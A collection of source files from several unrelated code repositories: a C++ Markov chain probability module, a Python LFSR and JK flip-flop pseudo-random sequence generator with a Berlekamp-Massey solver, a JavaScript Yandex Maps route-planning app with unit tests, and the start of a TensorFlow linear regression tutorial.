}
// Sum each row of the transition-count matrix; the caller frees the result.
int* MarkovChain::countRowsTotals(int** transitionMatrix, int numOfElements) {
    int* totals = (int *)malloc(numOfElements*sizeof(int));
    for (int row = 0; row < numOfElements; row++) {
        int sum = 0;
        for (int col = 0; col < numOfElements; col++)
            sum += transitionMatrix[row][col];
        totals[row] = sum;
    }
    return totals;
}
// Convert transition counts to row-normalised probabilities.
// Caller frees each row, then the row array.
double** MarkovChain::createTransitionProbabilityMatrix(int* rowsTotals, int** transitionMatrix, int numOfElements) {
    double** probMatrix;
    probMatrix = (double **) malloc(numOfElements*sizeof(double *));
    for(int i = 0; i < numOfElements; i++)
        probMatrix[i] = (double *) malloc(numOfElements*sizeof(double));
    for (int i = 0; i < numOfElements; i++) {
        for (int j = 0; j < numOfElements; j++) {
            // Fix: a state that never transitions has a zero row total; the
            // original divided by zero here, producing NaN/inf entries.
            if (rowsTotals[i] == 0)
                probMatrix[i][j] = 0.0;
            else
                probMatrix[i][j] = (double)transitionMatrix[i][j] / (double)rowsTotals[i];
        }
    }
    return probMatrix;
}
//the returning array has the state probabilities in the same order as the "elements" array
double * MarkovChain::calculateFirstStatesProbabilities (char* elements, int numOfElements, char** sequences, int numOfSecuences) {
double * firstStateProbs = (double *)malloc(numOfElements*sizeof(double));
int* firstStates = getFirstStates(elements, numOfElements, sequences, numOfSecuences);
int total = 0;
for(int i = 0; i < numOfElements; i++) {
total = total + firstStates[i];
}
for(int i = 0; i < numOfElements; i++) {
firstStateProbs[i] = (double)firstStates[i] / (double)total;
}
return firstStateProbs;
}
// Index of `element` within `elements`, or -1 when absent.
// Fix: the original fell off the end of a value-returning function when
// the element was not found — undefined behaviour.
int getElementPosition(char element, char* elements, int numOfElements) {
    for (int i = 0; i < numOfElements; i++) {
        if (element == elements[i])
            return i;
    }
    return -1;
}
//******************************************************************************************
//******* Only the following functions are needed to be called to use Markov Chains ********
//******************************************************************************************
/*
 * Returns the next-state probability row for `element`, in the same order
 * as `elements`.  The caller frees the returned array.
 * Returns NULL when `element` does not appear in `elements`.
 */
double* MarkovChain::getNextTransitions(char element, char* elements, int numOfElements, char ** sequences, int numSequences ) {
    double* probabilities = (double *)malloc(numOfElements*sizeof(double));
    // Locate the matrix row corresponding to `element`.
    int row = -1;
    for (int i = 0; i < numOfElements; i++) {
        if (elements[i] == element && row == -1) {
            row = i;
        }
    }
    if (row == -1) {
        // NOTE(review): `probabilities` is leaked on this early return.
        return NULL;
    }
    // counts -> row totals -> probability matrix, then copy out one row.
    int ** transitionMatrix = createTransitionMatrix(elements, numOfElements, sequences, numSequences);;
    int * rowsTotals = countRowsTotals(transitionMatrix, numOfElements);
    double ** transitionProbabilityMatrix = createTransitionProbabilityMatrix(rowsTotals, transitionMatrix, numOfElements);
    for (int i = 0; i < numOfElements; i++) {
        double prob = transitionProbabilityMatrix[row][i];
        probabilities[i] = prob;
    }
    // Release the intermediate structures.
    for(int i = 0; i < numOfElements; i++)
        free(transitionMatrix[i]);
    free(transitionMatrix);
    free(rowsTotals);
    for(int i = 0; i < numOfElements; i++)
        free(transitionProbabilityMatrix[i]);
    free(transitionProbabilityMatrix);
    return probabilities;
}
/*
 * Returns the occurrence probability of a given sequence: the first-state
 * probability multiplied by each chained transition probability.
 */
double MarkovChain::getSequenceProbability(char* sequence, int seqElementsNum, char* elements, int numOfElements, char ** sequences, int numSequences) {
    double probability = 1.0;
    int ** transitionMatrix = createTransitionMatrix(elements, numOfElements, sequences, numSequences);;
    int * rowsTotals = countRowsTotals(transitionMatrix, numOfElements);
    double **transitionProbabilityMatrix = createTransitionProbabilityMatrix(rowsTotals, transitionMatrix, numOfElements);
    double * firstStateProbabilities = calculateFirstStatesProbabilities (elements, numOfElements, sequences, numSequences);
    // Multiply the probability of each adjacent transition in `sequence`.
    for (int i = 0; i < seqElementsNum-1; i++) {
        int row = getElementPosition(sequence[i], elements, numOfElements);
        int col = getElementPosition(sequence[i+1], elements, numOfElements);
        probability = probability * transitionProbabilityMatrix[row][col];
    }
    // Weight by the probability of starting in the first state.
    int firstElementPos = getElementPosition(sequence[0], elements, numOfElements);
    probability = firstStateProbabilities[firstElementPos] * probability;
    // Release the intermediate structures.
    for(int i = 0; i < numOfElements; i++)
        free(transitionMatrix[i]);
    free(transitionMatrix);
    free(rowsTotals);
    for(int i = 0; i < numOfElements; i++)
        free(transitionProbabilityMatrix[i]);
    free(transitionProbabilityMatrix);
    free (firstStateProbabilities);
    return probability;
}
<file_sep># Markov-chain-test | 7c9816e0243827df6e1b2681e70e7b8e020d3689 | [
"Markdown",
"Makefile",
"C++"
] | 5 | C++ | NikosMouzakitis/Markov-chain-test | eaaf47de39c9128e6049dc23358f11c477b4e7d7 | b93d14dde44178c2c07b87c1468573d8493328d0 |
refs/heads/master | <repo_name>D0ub1ePieR/Pseudo-randomSequenceGenerationByLsrf<file_sep>/stream-cipher.py
from mlist import lfsr_jk
from info import get_info
from B_M import solve
def output(list):
    """Print a 0/1 sequence: a space after every 8 bits, a newline after
    every 64 bits, and a final trailing newline."""
    emitted = 0
    for element in list:
        print(element, end="")
        emitted += 1
        if emitted % 8 == 0:
            print(" ", end="")
        if emitted % 64 == 0:
            print()
    print()
def outpoly(result):
    """Pretty-print the B-M linear-synthesis polynomial f(x)=1+...+x^i.

    `result` holds the coefficients of x^1..x^8 in positions 1..8; every
    coefficient is reduced mod 2 in place (the argument list is mutated).
    NOTE(review): result[0] is reduced but never printed — the constant
    term is hard-coded as "1" in the output string.
    """
    print("线性综合解为: f(x)=1",end="")
    result[0]=int(result[0])%2
    for i in range(1,9):
        result[i]=int(result[i])%2
        if result[i]>0:
            if i==1:
                print("+x",end="")
            else:
                print("+x^",end="")
                print(i,end="")
    print("\n系数为:",list(reversed(result[:9])))
def main():  # main routine: overall control flow
    """Drive the whole pipeline: read input, run the LFSR/JK generator,
    print the sequences, then recover the primitive polynomial via B-M."""
    # Gather the student number and primitive-polynomial coefficients.
    information=get_info()
    st_num=information.re_st_num()
    poly=information.re_poly()
    print()
    print("当前学号为: ",st_num)
    print("当前使用的本原多项式系数为: ",poly)
    # Hash the student number with MD5 and load it into the LFSRs.
    proc=lfsr_jk(st_num,poly)
    proc.run()
    print("当前md5的hash值为: ",proc.get_md5())
    print("当前输出测试序列长度: ",proc.get_total())
    print("当前list1序列为:"),output(proc.get_list1())
    print("list1一个周期的序列为:"),output(proc.get_list1()[:255])
    print("当前list2序列为:"),output(proc.get_list2())
    print("list2一个周期的序列为:"),output(proc.get_list2()[:255])
    print("当前qlist序列为:"),output(proc.get_qlist()[1:])
    # Use the Berlekamp-Massey algorithm on a 16-bit window of the
    # m-sequence to obtain its linear synthesis (the primitive polynomial).
    # The window starts at the first 0 bit found in list1.
    for i in range(512):
        if proc.get_list1()[i]==0:
            break
    re=solve(proc.get_list1()[i:i+16])
    #re=solve([0,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0])
    re.figure_out()
    result=re.get_result()
    outpoly(result)
main()
<file_sep>/README.md
# Pseudo-randomSequenceGenerationByLsrf
通过8位线性移位寄存器伪随机序列生成
---Cryptography lab
# info
stream-cipher.py为主程序
info.py中获取需要运算的基本信息
mlist.py中将数据放入lsrf中并使用jk触发器处理首先得到255为周期的m序列随后得到无周期的伪随机序列
B_M.py中反解出所使用的本原多项式即它的线性综合解
F_X.py中处理B-M算法中所有fx中的x前面的系数
运行stream-cipher.py根据提示输入 可以得到对应学号以及本元表达式生成的序列以及反解出来得到原本原多项式
<file_sep>/mlist.py
import hashlib
class lfsr_jk:
def __init__(self,st_num,poly):
self.__binmap={'0':'0000','1':'0001','2':'0010','3':'0011','4':'0100','5':'0101','6':'0110','7':'0111',
'8':'1000','9':'1001','a':'1010','b':'1011','c':'1100','d':'1101','e':'1110','f':'1111'}
self.__st_num=st_num
self.__poly=poly
self.__md5_hash=''
self.__list1=[] #使用md5加密后的后3-4位lfsr生成的序列
self.__list2=[] #使用md5加密后的后1-2位lfsr生成的序列
self.__qlist=[] #经过jk触发器处理后的序列
self.__number=512 #生成的序列长度
def __md5(self):
self.__md5_hash=hashlib.md5(self.__st_num.encode('utf-8')).hexdigest()
#print(md5)
for i in [-4,-3]:
for j in range(4):
self.__list1.append(int(self.__binmap[self.__md5_hash[i]][j])) #预存8bit初始状态至list1
for i in [-2,-1]:
for j in range(4):
self.__list2.append(int(self.__binmap[self.__md5_hash[i]][j])) #预存8bit初始状态至list2
def __lfsr(self,list):
for i in range(self.__number):
tmp=0
for j in range(8):
tmp=tmp+self.__poly[j]*list[i+j]
#print(poly[j],list1[i+j])
tmp=tmp%2
#print(tmp)
list.append(tmp)
def __check(self,num):
"""
取反
"""
if num==0:
return 1
else:
return 0
def __jk(self,list1,list2):
"""
模拟jk触发器
"""
self.__qlist.append(0)
for i in range(self.__number):
qn=list1[i]*self.__check(self.__qlist[i])+self.__check(list2[i])*self.__qlist[i]
qn=qn%2
self.__qlist.append(qn)
def run(self):
"""
运行
"""
self.__md5()
self.__lfsr(self.__list1)
self.__lfsr(self.__list2)
self.__jk(self.__list1,self.__list2)
def get_md5(self):
"""
返回md5的hash值
"""
return self.__md5_hash
def get_list1(self):
"""
返回list1
"""
return self.__list1
def get_list2(self):
"""
返回list2
"""
return self.__list2
def get_qlist(self):
"""
返回qlist
"""
return self.__qlist
def get_total(self):
"""
返回序列长度
"""
return self.__number
<file_sep>/info.py
class get_info:
def __init__(self):
self.__polynomial=[[1,0,0,0,1,1,1,0,1],
[1,0,0,1,0,1,0,1,1],
[1,0,0,1,0,1,1,0,1],
[1,0,1,0,0,1,1,0,1],
[1,0,1,0,1,1,1,1,1],
[1,0,1,1,0,0,0,1,1],
[1,0,1,1,0,0,1,0,1],
[1,0,1,1,0,1,0,0,1],
[1,0,1,1,1,0,0,0,1],
[1,1,0,0,0,0,1,1,1],
[1,1,0,0,0,1,1,0,1],
[1,1,0,1,0,1,0,0,1],
[1,1,1,0,0,0,0,1,1],
[1,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,1],
[1,1,1,1,1,0,1,0,1]]
self.__get_st_num()
self.__get_poly()
def __get_st_num(self):
"""
确定学号
"""
choice=input("当前学号:161520322\n是否使用预设学号?(Y/N) ")
while True:
if choice.capitalize()=='N':
self.__st_num=input("请输入你的学号? ")
break
elif choice.capitalize()=='Y':
self.__st_num="161520322"
break
else:
choice=input("输入有误!请重新输入:")
def __get_poly(self):
"""
确定使用的本原多项式
"""
print("GF(8)中的本原多项式有:\n(格式为:f(x)=cnx^8+(cn-1)x^7...+c2x^2+c1x+1)")
num=0
for list in self.__polynomial:
print(num,list)
num=num+1
flag=False
while flag==False:
try:
choice=eval(input("请输入选择的本原多项式序号:"))
except NameError:
"""
用户输入了非数字
"""
print("请输入一个数字!\n")
except:
print("Unexcepted Error Occured!\n")
else:
try:
self.__poly=self.__polynomial[choice]
except IndexError:
"""
用户输入的地址越界
"""
print("请输入一个0-15的数字!\n")
except:
print("Unexcepted Error Occured!\n")
else:
flag=True
def re_st_num(self):
"""
返回学号
"""
return self.__st_num
def re_poly(self):
"""
返回本原多项式系数
"""
return self.__poly
<file_sep>/F_x.py
from copy import deepcopy
class func:
def __init__(self,list):
self.maxlen=16
self.flist=[]
for i in range(self.maxlen):
if i<len(list):
self.flist.append(list[i])
else:
self.flist.append(0)
@classmethod
def fx_add(cls,fx1,fx2):
tlist=[]
maxlen=16
for i in range(maxlen):
tlist.append(fx1.flist[i]+fx2.flist[i])
return func(tlist)
@classmethod
def fx_multiply(cls,fx1,fx2):
tlist=[]
maxlen=16
if fx1.flist[0]!=0:
for i in range(maxlen):
tlist.append(fx2.flist[i]*fx1.flist[0])
return func(tlist)
else:
for i in range(1,maxlen):
tlist=deepcopy(fx2.flist)
if fx1.flist[i]!=0:
try:
for j in range(maxlen):
if tlist[maxlen-1-j]!=0:
tlist[maxlen-1-j+i]=tlist[maxlen-1-j]
tlist[maxlen-1-j]=0
for j in range(i):
tlist[j]=0
except IndexError:
print("Error Occured!\n")
except:
print("Unexcept Error Occured!\n")
break
return func(tlist)
@classmethod
def fx_copy(cls,fx1):
return func(fx1.flist)
def get_flist(self):
"""
获得自身函数系数序列
"""
return self.flist
<file_sep>/B_M.py
from F_x import func
class solve:
def __init__(self,list):
self.__list=list
self.__result=[]
def figure_out(self):
"""
反解出线性综合解
"""
a=[] #序列an
d=[] #序列dn
l=[] #序列ln
fx=[] #序列函数fn(x)
#初始化B-M算法中所有用到的序列
for element in self.__list:
a.append(element)
d.append(0)
l.append(0)
fx.append(None)
l.append(0)
fx.append(None)
#找到第一个an!=0
for index in range(len(a)):
if a[index]!=0:
d[index]=1
l[index+1]=index+1
for i in range(1,index+1):
fx[i]=func([1])
templist=[]
templist.append(1)
for i in range(1,index+1):
templist.append(0)
templist.append(-1)
fx[index+1]=func(templist)
break
#开始迭代
#求dn
for n in range(index+1,len(a)):
for i in range(n+1):
d[n]=d[n]+a[i]*fx[n].flist[n-i]
d[n]=d[n]%2
#print(n)
#print(a[i],fx[n].flist[n-i])
#求m
for i in range(1,n+1):
if l[n-i]<l[n]:
m=n-i
break
#print(m)
if d[n]!=0:
#求f(n+1)x
tlist=[]
for i in range(16):
tlist.append(0)
tlist[n-m]=1
fx[n+1]=func.fx_add(fx[n],func.fx_multiply(func([d[n],]),func.fx_multiply(func([1/d[m],]),func.fx_multiply(func(tlist),fx[m]))))
l[n+1]=max(l[n],n+1-l[n])
else:
fx[n+1]=func.fx_copy(fx[n])
l[n+1]=l[n]
self.__result=fx[16].flist
#print("an序列为: ",a)
#print("dn序列为: ",d[:16])
#print("ln序列为: ",l[:16])
def get_result(self):
"""
得到所求得的线性综合解
"""
return self.__result
| 1506bdb6d0a028960b015fa8cfe05f2919356c84 | [
"Markdown",
"Python"
] | 6 | Python | D0ub1ePieR/Pseudo-randomSequenceGenerationByLsrf | d342bcc3fccf1929b67b03933918987fd95b7076 | da6a3c50a69e320706e67d5dc38dcbaf4473384d |
refs/heads/master | <repo_name>alexbol903/FunBoxTest<file_sep>/src/js/tests/Model.test.js
import { expect } from 'chai';
import List from '../Model';
const createList = addItems => {
const newList = new List();
let i = 1;
while (i <= addItems) {
newList.addItem(`New text ${i}`, i);
i++;
}
return newList;
}
describe('Model: add new 5 item', () => {
const list = createList(5);
it('List length should be 5', () => {
expect(list.items).to.have.lengthOf(5);
});
it('Item 2 - id should be string', () => {
expect(list.items[ 1 ].id).to.be.a('string');
});
it('Item 2 - text should be string and equal New text 2', () => {
expect(list.items[ 1 ].text).to.be.a('string').to.equal('New text 2')
});
it('Item 2 - count should be number and equal 2', () => {
expect(list.items[ 1 ].count).to.be.a('number').to.equal(2);
});
it('Item 2 - readyToMove should be false', () => {
expect(list.items[ 1 ].readyToMove).to.be.false;
});
});
describe('Model: List have 4 Items after delete the Item 3', () => {
const list = createList(5);
before(() => {
list.deleteItem(list.items[ 2 ].id);
});
it('List length should be 4', () => {
expect(list.items).to.have.lengthOf(4);
});
it('Item 2 text should be New text 2', () => {
expect(list.items[ 1 ].text).to.equal('New text 2');
});
it('Item 2 count should be 2', () => {
expect(list.items[ 1 ].count).to.equal(2);
});
it('Item 3 text should be New text 4', () => {
expect(list.items[ 2 ].text).to.equal('New text 4');
});
it('Item 3 count should be 3', () => {
expect(list.items[ 2 ].count).to.equal(3);
});
it('Last Item text should be New text 5', () => {
expect(list.items[ 3 ].text).to.equal('New text 5');
});
it('Last Item count should be 4', () => {
expect(list.items[ 3 ].count).to.equal(4);
});
});
describe('Model: Move Item 2 to Up on 1 step', () => {
const list = createList(3);
before(() => {
list.moveUp(list.items[ 1 ].id);
});
it('Item 1 text should be a New text 2 and count equal 1', () => {
expect(list.items[ 0 ]).to.have.property('text', 'New text 2');
expect(list.items[ 0 ]).to.have.property('count', 1);
});
it('Item 2 text should be a New text 1 and count equal 2', () => {
expect(list.items[ 1 ]).to.have.property('text', 'New text 1');
expect(list.items[ 1 ]).to.have.property('count', 2);
});
it('Item 3 text should be a New text 3 and count equal 3', () => {
expect(list.items[ 2 ]).to.have.property('text', 'New text 3');
expect(list.items[ 2 ]).to.have.property('count', 3);
});
});
describe('Model: Move Item 1 to Down on 1 step', () => {
const list = createList(3);
before(() => {
list.moveDown(list.items[ 0 ].id);
});
it('Item 1 text should be a New text 2 and count equal 1', () => {
expect(list.items[ 0 ]).to.have.property('text', 'New text 2');
expect(list.items[ 0 ]).to.have.property('count', 1);
});
it('Item 2 text should be a New text 1 and count equal 2', () => {
expect(list.items[ 1 ]).to.have.property('text', 'New text 1');
expect(list.items[ 1 ]).to.have.property('count', 2);
});
it('Item 3 text should be a New text 3 and count equal 3', () => {
expect(list.items[ 2 ]).to.have.property('text', 'New text 3');
expect(list.items[ 2 ]).to.have.property('count', 3);
});
});
<file_sep>/src/js/Controller.js
import List from './Model';
import * as View from './View';
const state = {};
/**
* MAP CONTROLLER
*/
const controlMap = async () => {
try {
View.loader.renderLoader();
await ymaps.ready(View.init);
setTimeout(() => {
View.loader.clearLoader();
View.elements.pointsButton.disabled = false;
}, 500);
} catch (error) {
alert(error);
}
};
controlMap();
/**
* LIST CONTROLLER
*/
const controlList = () => {
if (!state.list) state.list = new List();
const text = View.elements.inputText.value;
const count = state.list.items.length + 1;
const reg = /\S/;
if (!text.match(reg)) return;
const item = state.list.addItem(text, count);
View.renderItem(item);
View.addSlideClass(item.id);
return { element: View.searchItem(item.id), item: item };
};
const uptateList = () => {
state.list.items.forEach((el, i) => {
const itemsCount = View.updateItemsCount();
itemsCount[ i ].textContent = el.count;
});
updatePointMap();
};
/**
* ITEMS CONTROLLER
*/
const addItem = () => {
const list = controlList();
if (!list) return;
View.clearInput();
View.elements.inputText.focus();
addPointMap(list.item);
addScrollItem(list.element);
};
const deleteItem = event => {
const btnDel = event.target.closest('.item__button--delete');
if (!btnDel) return;
const id = event.target.closest('.item').dataset.itemid;
state.list.deleteItem(id);
const time = View.deleteItem(id);
setTimeout(() => {
deletePointMap(id);
uptateList();
if (!state.list.items.length) delete state.list;
}, time);
};
/**
* MOVE CONTROLLER
*/
// Element ready to move
const mouseDownItem = event => {
if (event.which != 1 && !shiftKeyCode(event)) return;
const item = event.target.closest('.item');
const btnDel = event.target.closest('.item__button--delete');
if (!item || btnDel) return;
state.element = {};
state.element.item = item;
state.element.coordItem = View.getCoords(item);
state.element.posY = event.pageY - state.element.coordItem.top;
item.readyToMove = true;
View.addBackgroundItem(item);
item.focus();
if (!shiftKeyCode(event)) {
document.onmouseup = mouseUpItem;
View.elements.itemsList.onmousemove = mouseMoveItem;
}
};
// Element don't readyness to move
const mouseUpItem = event => {
if (!state.element.item) return;
const item = state.element.item;
item.readyToMove = false;
View.removeBackgroundItem(item);
View.stopMoveMouse(state.element.item);
if (state.element.clone) {
View.deleteClone(state.element.clone);
item.focus();
}
if (!shiftKeyCode(event)) {
document.onmouseup = null;
View.elements.itemsList.onmousemove = null;
}
delete state.element;
};
const mouseMoveItem = event => {
const item = state.element.item;
if (!state.element.clone) createCloneItem(item);
const clone = state.element.clone;
const coordList = View.getCoords(View.elements.itemsList);
const value = event.pageY - state.element.posY - coordList.top;
View.startMoveMouse(state.element.clone, value);
const coordClone = View.getCoords(clone);
const coordItem = View.getCoords(item);
if (coordClone.bottom < coordItem.top) {
moveItemUp(item);
} else if (coordClone.top > coordItem.bottom) {
moveItemDown(item);
}
clone.textContent = item.textContent;
moveScrollItem(event.clientY, value);
};
const createCloneItem = item => {
const clone = item.cloneNode(true);
state.element.clone = clone;
item.style.visibility = 'hidden';
item.parentElement.appendChild(clone);
clone.style.width = state.element.coordItem.width + 'px';
clone.style.userSelect = 'none';
clone.style.position = 'absolute';
};
const onKeydownItem = event => {
const item = state.element.item;
if (!(item && item.readyToMove)) return;
if (event.keyCode === 38) {
moveItemUp(item);
} else if (event.keyCode === 40) {
moveItemDown(item);
}
};
const moveItemUp = item => {
const previousItem = item.previousElementSibling;
if (previousItem) {
state.list.moveUp(item.dataset.itemid);
item.parentElement.insertBefore(item, previousItem).focus();
uptateList();
}
};
const moveItemDown = item => {
const nextItem = item.nextElementSibling;
if (nextItem) {
item.parentElement.insertBefore(item, nextItem.nextElementSibling).focus();
} else {
item.parentElement.insertBefore(item, null).focus();
}
state.list.moveDown(item.dataset.itemid);
uptateList();
};
/**
* SCROLL CONTROLLER
*/
const addScrollItem = item => {
if (!item) return;
const coordItem = item.getBoundingClientRect();
const listBoxHeight = View.elements.itemsListBox.clientHeight;
const listHeight = View.elements.itemsList.clientHeight;
if (listBoxHeight === listHeight) return;
View.elements.itemsListBox.scrollTop += coordItem.height + 15;
};
const moveScrollItem = clientY => {
if (!clientY) return;
const listBoxTop = View.elements.itemsListBox.offsetTop;
const listBoxBottom =
View.elements.itemsListBox.offsetTop +
View.elements.itemsListBox.clientHeight;
const percentOfListHeight = listBoxBottom * 0.2;
const step = 7;
if (clientY < listBoxTop + percentOfListHeight) {
View.elements.itemsListBox.scrollTop -= step;
} else if (clientY > listBoxBottom - percentOfListHeight) {
View.elements.itemsListBox.scrollTop += step;
}
};
/**
* POINTS
*/
const addPointMap = item => {
if (!state.pointCollection) {
const geoCollection = View.createCollectionMap();
state.pointCollection = geoCollection;
}
const newPoint = View.addPointMap(item);
const geoObjects = View.elements.map.geoObjects;
state.pointCollection.add(newPoint);
if (state.pointCollection.getLength() > 1) {
updateLineStringCoords();
}
geoObjects.add(state.pointCollection);
newPoint.events.add('dragend', updatePointMap);
};
const updateLineStringCoords = () => {
const geoObjects = View.elements.map.geoObjects;
geoObjects.remove(state.LineString);
const lineString = View.addLineStringMap(getCoordsPoints());
state.LineString = lineString;
geoObjects.add(state.LineString)
};
const getCoordsPoints = () => {
const coords = [];
state.pointCollection.each(el => {
coords.push(el.geometry.getCoordinates());
});
return coords;
};
const deletePointMap = id => {
const pointCollection = state.pointCollection;
pointCollection.each(el => {
if (el.id === id) pointCollection.remove(el)
});
updateLineStringCoords();
if (!pointCollection.getLength()) delete state.pointCollection;
};
const updatePointMap = () => {
if (!state.pointCollection) return;
const pointCollection = state.pointCollection;
const listItems = state.list.items;
let address;
pointCollection.each(async (el, index) => {
el.id = listItems[index].id;
el.properties.set('iconContent', listItems[ index ].count);
address = await getAddressPoint(el, index);
el.properties.set('balloonContent', View.setBalloonContent(listItems[ index ].text, address));
pointCollection.add(el, index);
});
updateLineStringCoords();
};
const getAddressPoint = async (el, index) => {
const point = el;
let address;
const coords = point.geometry.getCoordinates();
await ymaps.geocode(coords, { kind: 'house', results: state.pointCollection.getLength()}).then(res => {
const firstGeoObject = res.geoObjects.get(index);
address = firstGeoObject.getAddressLine();
});
return address;
};
/**
* EVENTS
*/
View.elements.pointsButton.onclick = addItem;
View.elements.pointBox.addEventListener('keydown', event => {
if (event.keyCode !== 13) return;
addItem(event);
});
View.elements.itemsList.onclick = deleteItem;
View.elements.itemsList.onmousedown = mouseDownItem;
View.elements.itemsList.onkeydown = event => {
if (shiftKeyCode(event)) {
mouseDownItem(event);
} else if (event.keyCode === 38 || event.keyCode === 40) {
onKeydownItem(event);
}
};
View.elements.itemsList.onkeyup = event => {
if (!shiftKeyCode(event)) return;
mouseUpItem(event);
};
const shiftKeyCode = event => event.keyCode === 16;
<file_sep>/src/js/Model.js
import uniqid from 'uniqid';
export default class List {
constructor() {
this.items = [];
}
addItem(text, count) {
const item = {
id: uniqid(),
text: text,
count,
readyToMove: false,
};
this.items.push(item);
return item;
}
deleteItem(id) {
const index = this.getIndex(id);
this.items.splice(index, 1);
this.updateItems(index);
}
updateItems(startIndex, endIndex = this.items.length) {
let item;
for (let i = startIndex; i < endIndex; i++) {
item = this.items[i];
item.count = i + 1;
item.text = item.text;
}
}
moveUp(id) {
const index = this.getIndex(id);
if (index !== 0) {
const item = this.items[index];
const itemAbove = this.items[index - 1];
this.items.splice(index - 1, 1, item);
this.items.splice(index, 1, itemAbove);
this.updateItems(index - 1, index + 1);
}
}
moveDown(id) {
const index = this.getIndex(id);
if (index !== this.items.length - 1) {
const item = this.items[index];
const itemBelow = this.items[index + 1];
this.items.splice(index + 1, 1, item);
this.items.splice(index, 1, itemBelow);
this.updateItems(index, index + 2);
}
}
getIndex(id) {
return this.items.findIndex(el => el.id === id);
}
}
<file_sep>/src/js/View.js
export const elements = {
map,
rightColumn: document.querySelector('.column--right'),
pointBox: document.querySelector('.points__input-box'),
inputText: document.querySelector('.points__input'),
pointsButton: document.querySelector('.points__button'),
itemsList: document.querySelector('.points__items-list'),
itemsListBox: document.querySelector('.points__items-list-box')
};
/*
* LOADER
*/
export const elementString = {
loader: 'sk-double-bounce'
};
export const loader = {
element: `<div class='${elementString.loader}'>
<div class='sk-child sk-double-bounce-1'></div>
<div class='sk-child sk-double-bounce-2'></div>
</div>`,
renderLoader() {
elements.rightColumn.insertAdjacentHTML('afterbegin', this.element);
},
clearLoader() {
const loader = document.querySelector(`.${elementString.loader}`);
loader.parentElement.removeChild(loader);
}
};
/*
* MAP
*/
const startCoords = [ 53.354174, 83.777556 ];
export const init = () => {
elements.map = new ymaps.Map('map', {
center: startCoords,
zoom: 16,
controls: [ 'zoomControl', 'fullscreenControl' ]
});
};
/*
* POINTS
*/
export const createCollectionMap = () => {
const collection = new ymaps.GeoObjectCollection({}, {
preset: 'islands#blackStretchyIcon',
});
return collection;
};
export const addPointMap = item => {
const newPoint = new ymaps.Placemark(
startCoords,
{
iconContent: `${item.count}`,
balloonContent: setBalloonContent(item.text)
},
{
draggable: true
}
);
newPoint.id = item.id;
return newPoint;
};
export const addLineStringMap = coords => {
const lineString = new ymaps.GeoObject({
geometry: {
type: 'LineString',
coordinates: coords
}
}, {
draggable: false,
strokeColor: '#297acc',
strokeWidth: 5
});
return lineString;
};
export const setBalloonContent = (text, address = 'Адрес не найден...') => {
const balloonContent = `
<p class="balloon-content__text">${text}</p>
<p class="balloon-content__address">${address}</p>`;
return balloonContent;
};
/*
* ITEMS
*/
export const renderItem = item => {
const markup = `
<div class="item" data-itemid=${item.id} tabindex="0">
<p class="item__text"><span class="item__count">${item.count}</span> - ${
item.text
}</p>
<button
type="button"
id="itemDelete"
class="item__button--delete"
disabled="true"
>
<svg
class="button-cross"
width="100%"
height="100%"
viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg"
>
<circle cx="50" cy="50" r="40" />
<line x1="35" y1="65" x2="65" y2="35" />
<line x1="35" y1="35" x2="65" y2="65" />
</svg>
</button>
</div>`;
elements.itemsList.insertAdjacentHTML('beforeend', markup);
};
export const addSlideClass = id => {
const item = searchItem(id);
if (!item) return;
item.classList.add('slide-up');
const time = durationTime(item);
setTimeout(() => {
item.classList.remove('slide-up');
}, time);
};
export const deleteItem = id => {
const item = searchItem(id);
if (!item) return;
item.classList.add('zoom-in');
const time = durationTime(item);
setTimeout(() => {
item.parentElement.removeChild(item);
}, time);
return time
};
export const updateItemsCount = () => {
const itemsCount = document.querySelectorAll('.item__count');
return itemsCount;
};
export const searchItem = id => document.querySelector(`[data-itemid=${id}]`);
export const clearInput = () => {
elements.inputText.value = '';
};
// MOVE ITEM
export const addBackgroundItem = item => {
item.classList.add('item--active');
};
export const removeBackgroundItem = item => {
item.classList.remove('item--active');
};
export const startMoveMouse = (item, value) => {
item.style.top = `${value}px`;
};
export const stopMoveMouse = item => {
item.removeAttribute('style');
};
export const deleteClone = clone => {
clone.parentElement.removeChild(clone);
};
export const getCoords = item => {
const el = item.getBoundingClientRect();
return {
top: el.top + pageYOffset,
bottom: el.bottom + pageYOffset,
height: el.height,
width: el.width
};
};
const durationTime = item =>
parseFloat(window.getComputedStyle(item, null).animationDuration) * 1000;
| c1824dced2d35318255c9b563664c9f493afd946 | [
"JavaScript"
] | 4 | JavaScript | alexbol903/FunBoxTest | 61b38423dac22d2551aae3db3c1c45e8eaab2ab4 | 92f6bfb86c5a3ed3035c19e77c958b31da3bb709 |
refs/heads/main | <repo_name>diasirish/hands_on_ML_book_O-Reilly<file_sep>/README.md
# Hands on ML book by O-Reilly
In this project I will go over O'Reilly's book Hands-on Machine Learning with Scikit-Learn and TensorFlow. This project will contain main examples for the book along with the answers for the questions in the end of the chapters
~ please note that my comments and details about this project will be discussed mainly in Russian. Hence might be unaplicable for non-russina speakers. Sorry :)
<file_sep>/chapter_9/7_пространство_имен.py
# Расчет идет по классической линейной регрессии
# установка всех нужных пакетов
import sklearn
import tensorflow as tf
import numpy as np
from sklearn.datasets import fetch_california_housing
from datetime import datetime
# создаем отметки времени для журнального каталога
now = datetime.utcnow().strftime("%Y%m%d%H%M%S")
root_logdir = "tf_logs"
logdir = "{}/run-{}/".format(root_logdir, now)
# загрузка нужных данных с которыми мы будем работать
housing = fetch_california_housing()
m, n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
# для скорости градиентного вычесления мы стандартизируем данные
scaled_housing_data_plus_bias = sklearn.preprocessing.scale(housing_data_plus_bias, axis=0)
### СТАДИЯ ПОСТРОЕНИЯ ####
# задаем параметры к обучению
n_epochs = 1000
learning_rate = 0.01
#определяем X и y для создания мини-пакетного градиентного спуска
#создание узлов-заполнителей
X = tf.placeholder(tf.float32, shape=(None, n+1), name="X")
y = tf.placeholder(tf.float32, shape=(None,1), name="y")
#определяем размер пакета и подсчитываем количество пакетов
batch_size = 100
n_batches = int(np.ceil(m/batch_size))
# выгрузка данных с диска (Не в книге, стырил с https://github.com/ageron/handson-ml/blob/master/09_up_and_running_with_tensorflow.ipynb)
def fetch_batch(epoch, batch_index, batch_size):
np.random.seed(epoch * n_batches + batch_index)
indices = np.random.randint(m, size=batch_size)
X_batch = scaled_housing_data_plus_bias[indices]
y_batch = housing.target.reshape(-1, 1)[indices]
return X_batch, y_batch
